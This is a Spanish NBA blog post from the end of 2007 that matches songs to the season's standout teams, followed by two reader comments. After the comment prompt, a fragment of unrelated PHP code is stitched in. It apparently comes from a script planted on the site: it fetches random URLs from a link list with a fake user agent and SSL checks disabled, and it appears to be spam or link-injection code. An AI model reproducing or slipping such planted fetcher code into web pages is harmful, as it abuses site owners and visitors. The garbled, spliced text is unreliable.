Los hits TJNBA

31 de December de 2007 por MagicJohnson32

31 de diciembre. Se acaba el 2007 y en TJNBA planeamos hacer los cambios de rigor. A partir de Año Nuevo tendrás cada mañana un nuevo modelo de crónica, algo más creativo, si se me permite la expresión. Pero como el reloj de mi ordenador dice que todavía estamos en 2007, busquemos un plan alternativo para tratar la actualidad NBA. En un día festivo como el de hoy, qué mejor que un poco de música para acompañar una serie de comentarios sobre los equipos que más nos han llamado la atención en este arranque de temporada 2007-2008… Ahí van nuestra particular lista de hits:

“The Underdog” – Spoon & Portland TrailBlazers

Hace unas semanas, esta canción estaría dedicada a los Hornets. Sin embargo, los Blazers han hecho méritos más que sobrados para ser considerados la revelación, la gran sorpresa, ese equipo con todas las trazas de perdedor que se sitúa entre los mejores (lo que los americanos llaman “Underdog“) de lo que llevamos de temporada. Anoche se apuntaron su 13ª victoria consecutiva y están al frente de la división NorthWest, con idéntico balance al de Denver y cuatro derrotas menos que los Jazz. Los del estado de Oregon parecen haberse recuperado del golpe moral que supuso la lesión de Greg Oden y, de la mano de Roy y Aldridge, este grupo lleno de juventud y energía ha purgado la imagen de equipo conflictivo y perdedor que arrastraba desde los tiempos de los Jail Blazers.

“Back On Earth” – Ozzy Osbourne & L.A. Lakers

Los Lakers andan, a estas alturas de la temporada, mejor de lo previsto. Pero si en algún momento sus expectativas han sido demasiado altas, ahí estaban los Celtics para devolverlos a la tierra. Ocurrió el 23 de noviembre en la visita de los angelinos a Boston (94-107) y se repitió anoche, en un duelo rodeado de una gran expectativa y en el que los Celtics demostraron que están, como reconoció Bryant tras el partido, en el “siguiente nivel”. Los Lakers esperan alcanzar ese nivel en un futuro no muy lejano, apoyados en Kobe y en la emergencia del por momentos deslumbrante Andrew Bynum y un grupo de jóvenes con un potencial intrigante aunque incierto: Farmar, Ariza, Crittenton… De lo que éstos den de sí y de lo que la dirección deportiva de la franquicia sea capaz de obtener con los contratos de Kwame Brown y Lamar Odom dependerá que Lakers alcance ese “próximo nivel”, el que separa a los equipos de Playoffs de los favoritos al anillo. Kupchak acaba contrato, así que no pinta del todo mal en la Avenida Figueroa.

“Burning Benches” – Morning Runner & Isiah Thomas

Capitula el año y, cumpliendo con el ritual, nos propondremos nuevos retos y nos cuestionaremos mil cosas, comenzando por la más sangrante de todas: ¿por qué sigue Isiah Thomas al frente de los Knicks? El banquillo del Madison lleva caliente tanto tiempo que ya arde, aunque la franquicia neoyorquina acabaría antes echando a la hoguera a todos los que la componen, jugadores y propietario incluidos. Fuego redentor, pues, para Thomas, Dolan, Curry, Randolph, Marbury y compañía.

“The New Year” – Death Cab For Cutie & Boston Celtics

“So, this is the New Year, and I have no resolution…” . Como Ben Gibbard, empieza el año y no lo tengo claro. Si hacemos caso a las clasificaciones, los Celtics están por encima del resto. Pero aún no les hemos visto en las canchas más complicadas y su único enfrentamiento ante un candidato serio al anillo, los Pistons, terminó con derrota. Acabará la regular season y el balance de los Celtics será espectacular, eso es seguro salvo lesiones serias de sus estrellas. Pero no será hasta la llegada de los Playoffs cuando podremos juzgar la solvencia de un equipo con tres All-Stars y una gran defensa pero con limitaciones serias en el resto de aspectos. La acumulación de cansancio (Garnett, Pierce y Allen superan la treintena) y la carencia de recambios de garantías ante cualquier posible contratiempo ponen las dudas. Pero lo cierto es que hacía décadas que no asistíamos a semejante reunión de talento por parte de tres jugadores en su plenitud.

 

Comenta

2 comentarios a esta entrada

  1. Hynreck dice:
    #1

    Muy buenos los videos, los tienes tambien con música buena? 😛

    Jajaja, un saludo y feliz año!!!!

      Citar

  2. Jabho dice:
    #2

    Muy buenos si señor. El de los C´s casi me pone “pelo pollo”.

    Tienen limitaciones estos Celtics, pero menos de lo que parece. Rondo es un base competente y Perkins cumplirá con su faceta de trabajo bajo la pintura. El banco si genera mas dudas, pero incluso ahí House y Posey aportan cositas y alkgún que otro outsider como Davis puede ayudar. La clave es que no se les haga larga la regular con el ritmo que llevan. DE todas formas Garnett estña jugando 35 minutos por partido y Allen y Pierce 38. Razonable diria yo.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>